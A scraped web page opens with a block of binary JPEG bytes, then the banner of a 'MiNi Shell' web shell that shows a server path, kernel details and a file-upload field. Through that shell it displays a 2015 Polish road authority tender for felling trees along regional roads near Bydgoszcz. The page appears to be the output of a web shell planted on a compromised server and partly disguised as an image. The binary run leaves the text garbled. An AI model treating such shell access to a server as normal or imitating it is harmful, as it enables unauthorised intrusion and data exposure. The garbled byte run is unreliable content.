JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151120/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151120/170535-N-2015.html

<p class="kh_header"><b>Bydgoszcz: USŁUGI W ZAKRESIE WYCINKI DRZEW PRZY DROGACH WOJEWÓDZKICH ADMINISTROWANYCH PRZEZ RDW ŻOŁĘDOWO W 2015 ROKU</b><br>
<b>Numer ogłoszenia: 170535 - 2015; data zamieszczenia: 20.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd  Dróg Wojewódzkich , ul. Fordońska 6, 85-085 Bydgoszcz, woj. kujawsko-pomorskie, tel. (52) 370-57-17, faks (52) 370-57-16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw-bydgoszcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI W ZAKRESIE WYCINKI DRZEW PRZY DROGACH WOJEWÓDZKICH ADMINISTROWANYCH PRZEZ RDW ŻOŁĘDOWO W 2015 ROKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są: Usługi w zakresie wycinki drzew przy drogach wojewódzkich administrowanych przez RDW Żołędowo w 2015 r.
WSPÓLNY SŁOWNIK ZAMÓWIEŃ: CPV 77.21.14.00- 6 usługi wycinania drzew;
2. Zamówienie obejmuje  wykonanie następujących usług:  
- wycinkę drzew wraz z wywozem dłużycy i ewentualnie gałęzi za zgodą Zamawiającego poza pas drogowy,
- rozdrobnienie gałęzi pozostałych po wycince,
- frezowanie pni zlokalizowanych w koronie drogi na głębokość 15 cm poniżej uregulowanego poziomu pobocza,
- dostarczenie i wbudowanie materiału wraz z zagęszczeniem w miejsce usuniętych pni, 
- oczyszczenie terenu po wycince drzew i frezowaniu pni,
- oznakowanie terenu prac zgodnie z zatwierdzonym projektem organizacji ruchu,
- zakup pozyskanego drewna od Zamawiającego zgodnie z wyceną rzeczoznawcy.
3. Zestawienie drzew do wycinki na 2015 rok - nr drogi/km/strona/nr drzewa/gatunek drzewa/średnica/obwód:
droga 244, km 0+110 P, nr 1 - klon, śr. 80cm, ob. 251cm;
droga 244	0+240 P nr 2 Klon	78 245;
droga 244	0+250 L nr 3	Klon	68	214
droga 244	0+280 P nr 4 	Klon	68	214
droga 244	1+260 L nr 5	Klon	52	163
droga 244	1+330 L nr 6	Klon	59	185
droga 244	1+470 L nr 7	Klon	74	232
droga 244	1+950 P nr 8	Klon	47	145
droga 244	2+140 P nr 9	Klon	46	144
droga 244	2+260 P nr 10	Klon	70	220
droga 244	2+830 L nr 9*	Lipa	65	204
droga 244	2+970 P nr 11	Lipa	82	257
droga 244	2+980 P nr 12	Lipa	77	242
droga 244	3+870 L nr 13	Jesion 	82	257
droga 244	3+920 P nr 14	Jesion 	69	217
droga 244	5+110 L nr 15	Jesion 	77	242
droga 244	6+140 L nr 16	Lipa 	64	201
droga 244	7+540 P nr 12*	Kasztan	38	119
droga 244	7+560 P nr 17	Kasztan	47	145
droga 244	7+610 L nr 18	Kasztan	59	182
droga 244	7+640 P nr 19	Kasztan	68	214
droga 244	7+700 L nr 20	Kasztan	77	242
droga 244	7+710 P nr 21	Kasztan	70	220
droga 244	12+783 P Nr 22	Topola kanadyjska	83	261
droga 244	13+310 L Nr 23	Topola kanadyjska	77	242
droga 244	13+320 L Nr 24 	Topola kanadyjska	63	198
27	244	14+180 P Nr 25	Topola kanadyjska	65	204
28	244	14+730 P Nr 26 	Topola kanadyjska	55	173
29	244	14+750 P Nr 27 	Topola kanadyjska	43	135
30	244	14+760 P Nr 28 	Topola kanadyjska	58	182
31	244	29+020 P nr 29 	Klon	58	182
32	244	35+370 L nr 30	Klon	87	273
33	244	35+580 L nr 31	Jesion  	75	235
34	244	35+720 P nr 32 	Lipa	46	144
35	256	6+940 L nr 1	Jesion	39	122
36	256	7+590 L nr 2	Jesion	72	226
37	256	7+610 P nr 3	Jesion	48	151
38	256	7+830 P nr 4	Jesion	94	295
39	256	7+870 P nr 5	Jesion	62	195
40	256	10+350 L nr 6 	Jesion	100	314
41	256	10+830 L nr 7	Jesion	88	276
42	256	10+850 P nr 8	Jesion	70	220
43	256	11+150 L nr 9	Jesion	46	144
44	248	0+310 L nr 2	Klon	82	257
45	248	0+350 L nr 3	Klon	68	213
46	248	0+540 L nr 5	Klon	60	188
47	248	0+640 L nr 6	Klon	61	192
48	248	0+750 L nr 7	Klon	69	217
49	248	1+450 P nr 8	Klon	66	207
50	248	1+920 L nr 9	Klon	66	207
51	248	2+020 L nr 10	Klon	67	210
52	240	61+100 L nr 1 	Topola kanadyjska	57	179
53	240	61+090 L nr 2	Topola kanadyjska	71	223
54	240	61+080 L nr 3	Topola kanadyjska	61	192
55	240	60+980 L nr 4	Topola kanadyjska	75	235
56	240	60+710 L znak*	Topola kanadyjska	74	232
57	240	60+730 L znak*	Topola kanadyjska	77	242
58	240	60+740 L znak*	Topola kanadyjska	69	217
59	240	60+750 L znak*	Topola kanadyjska	68	214
60	240	60+760 L znak*	Topola kanadyjska	65	204
61	240	60+770 L znak*	Topola kanadyjska	63	198
62	240	59+280 P nr 5	Topola kanadyjska	47	148
63	240	59+270 P nr 6	Topola kanadyjska	48	151
64	240	59+260 P nr 7	Topola kanadyjska	45	141
65	240	59+250 P nr 8	Topola kanadyjska	50	157
66	240	53+050 P nr 9	Topola kanadyjska	59	185
67	240	52+360 L nr 10	Topola kanadyjska	69	217
68	240	52+350 L nr 11	Topola kanadyjska	90	283
69	240	52+290 P nr 12	Topola kanadyjska	50	157
70	240	51+610 P nr 13	Topola kanadyjska	71	223
71	240	50+930 L nr 14	Topola kanadyjska	51	160
72	240	50+920 L nr 15	Topola kanadyjska	53	166
73	240	50+510 L nr 16	Topola kanadyjska	100	314
74	240	50+370 L nr 17	Topola kanadyjska	67	210
75	240	50+360 L nr 18	Topola kanadyjska	61	192
76	240	50+350 L nr 19	Topola kanadyjska	67	210
77	240	48+550 L nr 20	Topola kanadyjska	60	188
78	239	1+190 L nr 1 	Jesion	56	176
79	239	1+240 P nr 2	Jesion	69	217
80	239	1+970 L nr 7	Jesion	55	173
81	239	2+000 L nr 8 	Jesion	51	160
82	239	2+010 L nr 3	Jesion	50	157
83	239	2+060 P nr 4	Jesion	65	204
84	239	2+110 P nr 5	Jesion	65	204
85	239	2+160 P nr 6 	Jesion	80	251
86	239	2+220 L nr 9	Jesion	68	214
87	239	2+240 L nr 10	Jesion	30	94
88	239	5+220 P nr 12	Jesion	52	163
89	239	5+640 P nr 11	Jesion	62	195
90	239	5+880 L nr 13	Jesion	57	179
91	239	6+940 P nr 14	Jesion	46	144
92	239	12+940 L nr 16	Klon	98	308
93	239	17+610 L nr 17	Topola 	72	226
94	239	17+720 L nr 18	Jesion 	59	185
95	239	23+720 L nr 19	Dąb	93	292
96	239	26+680 P nr 20	Lipa drobnolistna	57	179
97	239	26+690 P nr 21	Lipa drobnolistna	53	166
98	239	29+540 P nr 22	Lipa drobnolistna	74	220
99	239	32+970 P nr 22*	Lipa drobnolistna	78	245
100	239	33+005 P nr 23*	Lipa drobnolistna	89	279
101	239	33+020 P nr 24*	Lipa drobnolistna	103	323
102	214	169+070  L nr 1	Topola kanadyjska	55	173
103	214	171+430 P nr 2	Klon	41	129
104	377	4+895 P nr 1	Topola kanadyjska	100	314
105	377	4+904  P nr 2	Topola kanadyjska	92	289
106	377	4+840  L nr 3	Topola kanadyjska	88	276
107	272	0+060  P nr 1	Kasztan	53	166
108	272	1+690  L nr 2	Lipa drobnolistna	80	251
109	272	1+850 L nr 3	Lipa drobnolistna	83	261
110	272	4+770  P nr 4	Wierzba	71	223
111	207	0+550  P nr 1	Lipa drobnolistna	93	292
112	207	1+730 P nr 2	Lipa drobnolistna	74	232
113	207	1+902 P nr 3	Lipa drobnolistna	99	311
114	402	0+880  Lnr 1	Lipa drobnolistna	52	163
115	402	1+810 L nr 2	Lipa drobnolistna	70	220
116	402	2+580 P nr 3	Lipa drobnolistna	65	204
117	402	2+610 L nr 4	Lipa drobnolistna	65	204
UWAGA! Zamawiający zastrzega sobie prawo zmiany zakresu usługi przez zamianę drzew na inne, niż wymienione w tabeli powyżej.
4. Szczegółowy zakres usług objętych umową określony jest w opisie przedmiotu zamówienia, zestawieniu drzew do wycinki, szczegółowych specyfikacjach technicznych, związanych z wycinką drzew  nr  D - 00.00.00 Wymagania ogólne, 
D - 01.02.01 Wycinka drzew oraz kosztorysie ofertowym stanowiącym załącznik 
do umowy. 
5. Zamawiający zaleca Wykonawcą składającym ofertę do dokonania oględzin 
w terenie drzewostanu przewidzianego do wycinki i frezowania..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium, zgodnie z art. 45 ust. 2 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje  w  tym  zakresie  wymagań.  Zamawiający  dokona  oceny  spełniania  warunków udziału  w  postępowaniu  w  tym  zakresie  
na  podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt VI.A. ppkt. 1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wiedza i doświadczenie - o zamówienie mogą ubiegać się Wykonawcy posiadający wiedzę i doświadczenie z zakresu objętego zamówieniem. Wykonawca w celu zweryfikowania przez Zamawiającego jego zdolności do należytego wykonania udzielanego zamówienia oraz oceny spełnienia  warunku musi wykazać, że wykonał, a przypadku świadczeń okresowych lub ciągłych również wykonuje co najmniej 1 zamówienie na usługi wycinki drzew w pasie drogowym nie mniejsze niż 50 000,00 zł brutto z ostatnich 3 latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potencjał techniczny - o zamówienie mogą ubiegać się Wykonawcy dysponującym odpowiednim potencjałem technicznym. Wykonawca w celu zweryfikowania przez Zamawiającego jego zdolności do należytego wykonania udzielanego zamówienia oraz oceny spełnienia  warunku musi wykazać, 
iż dysponuje lub będzie dysponował w czasie wykonania umowy 
(wraz z informacją o podstawie dysponowania):
a) piły mechaniczne lub sprzęt równoważny - 6 szt.,
b) podnośnik koszowy lub sprzęt równoważny - 1 szt.,
c) ładowarka lub sprzęt równoważny - 2 szt.,
d) frezarka do frezowania pni lub sprzęt równoważny - 1 szt., 
e) ciągnik o mocy min 75 KM  z napędem na 4 koła lub sprzęt równoważny - 1 szt.,
f) ciągnik z przyczepą lub sprzęt równoważny - 2 szt.,
g) samochód samowyładowczy o ładowności min. 4 Mg lub sprzęt równoważny - 2 szt.;
h) mechaniczna rozdrabniarka do gałęzi lub sprzęt równoważny - 2 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Osoby zdolne do wykonania zamówienia - o zamówienie mogą ubiegać się Wykonawcy dysponujący odpowiednim potencjałem kadrowym. Wykonawca 
w celu zweryfikowania przez Zamawiającego jego zdolności do należytego wykonania udzielanego zamówienia oraz oceny spełnienia warunku musi wykazać, iż dysponuje lub będzie dysponował czasie wykonania umowy (wraz z informacją o podstawie dysponowania): 
- 6 osób posiadających uprawnienia do obsługi pił mechanicznych,
- 2 osoby do kierowania ruchem posiadające aktualne uprawnienia do zatrzymywania i  kierowania ruchem wydane przez Wojewódzki Ośrodek Ruchu Drogowego lub równoważne.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacja ekonomiczna - ubezpieczenie OC - o zamówienie mogą ubiegać się               Wykonawcy ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Wykonawca w celu zweryfikowania przez Zamawiającego jego zdolności do należytego wykonania udzielanego zamówienia oraz oceny spełnienia warunku musi wykazać, iż posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie niższą 20 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony i podpisany FORMULARZ OFERTY (Załącznik nr 1 do SIWZ).
2.	Wypełnione i podpisane KOSZTORYSY OFERTOWE (Załącznik nr 1.1 do SIWZ).
3.	W przypadku ustanowienia pełnomocnika do podpisywania oferty winno być dołączone pełnomocnictwo (oryginał lub kopia potwierdzona za zgodność 
z oryginałem przez notariusza) o ile nie wynika ono z innych dokumentów dołączonych do oferty.
4.	Do oferty wspólnej musi być dołączony dokument wskazujący pełnomocnika 
do reprezentowania wykonawców w postępowaniu i podpisania umowy. Pełnomocnictwo musi wymieniać wszystkich Wykonawców i być przez nich podpisane. Pełnomocnictwo musi jednoznacznie określać postępowanie do którego się odnosi i precyzować zakres umocowania. Pełnomocnictwo niniejsze musi być złożone w oryginale lub kopii poświadczonej za zgodność przez notariusza.
5.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, wykonawców na których zasobach polega wykonawca składający ofertę, a także wykonawców, na których zdolnościach finansowych polega wykonawca składający ofertę, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczone za zgodność z oryginałem przez Wykonawcę 
lub te podmioty.
6.   	Pisemne zobowiązanie podmiotów trzecich do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. (Oryginał lub kopia poświadczona notarialnie) (Załącznik nr 10 do SIWZ) - jeśli dotyczy - lub inny dokument, z którego takie zobowiązanie wynika. Dokumenty 
w swej treści powinny zawierać  informacje wskazane w pkt. V.2.
7.	Informację o tym, że Wykonawca nie należy do grupy kapitałowej, a jeśli należy to listę podmiotów należących do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów 
(Dz. U. z 2015r. poz. 184, z późn. zm.) (Załącznik nr 8 do SIWZ).
8.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem 
na język polski. W razie rozbieżności, decydujący jest tekst tłumaczenia polskiego.
10.  	W przypadku zastrzeżenia informacji stanowiących tajemnicę przedsiębiorstwa - uzasadnienie, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa.
Zamawiający będzie dokonywał weryfikacji zdolności wykonawcy 
do należytego wykonania zamówienia oraz oceny spełniania powyższych warunków oraz sprawdzenia kompletności i poprawności na podstawie dostarczonych oświadczeń i dokumentów.  Warunki będą oceniana wg formuły spełnia/nie spełnia. 
Dokumenty wymienione w pkt. A, B, C i D należy składać w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin realizacji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający wymaga zawarcia umowy w sprawie zamówienia publicznego 
na warunkach określonych we wzorze Istotnych Postanowień Umowy będącej                       załącznikiem nr 9 do niniejszej SIWZ, co Wykonawca potwierdza w formularzu              oferty.
2.	Zamawiający zgodnie z art. 144 ustawy PZP przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
2.1. 	Zmiana podwykonawcy - na pisemny wniosek Wykonawcy, dopuszcza się zmianę podwykonawcy, wprowadzenie nowego podwykonawcy lub rezygnację z udziału podwykonawcy przy realizacji przedmiotu zamówienia. Zamiana może nastąpić wyłącznie po przedstawieniu przez Wykonawcę oświadczenia podwykonawcy 
o jego rezygnacji z udziału w realizacji przedmiotu zamówienia oraz o braku roszczeń podwykonawcy wobec Wykonawcy z tytułu realizacji usług. Jeżeli zmiana dotyczy podmiotu trzeciego, na zasobach którego Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu, Zamawiający dopuści zmianę pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków 
w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia przez dotychczasowego podwykonawcę. Zmiany podwykonawcy można dokonać jedynie, jeżeli wykonywanie części robót przez podwykonawcę zostało wskazane przez Wykonawcę w ofercie. W wypadku gdy Wykonawca 
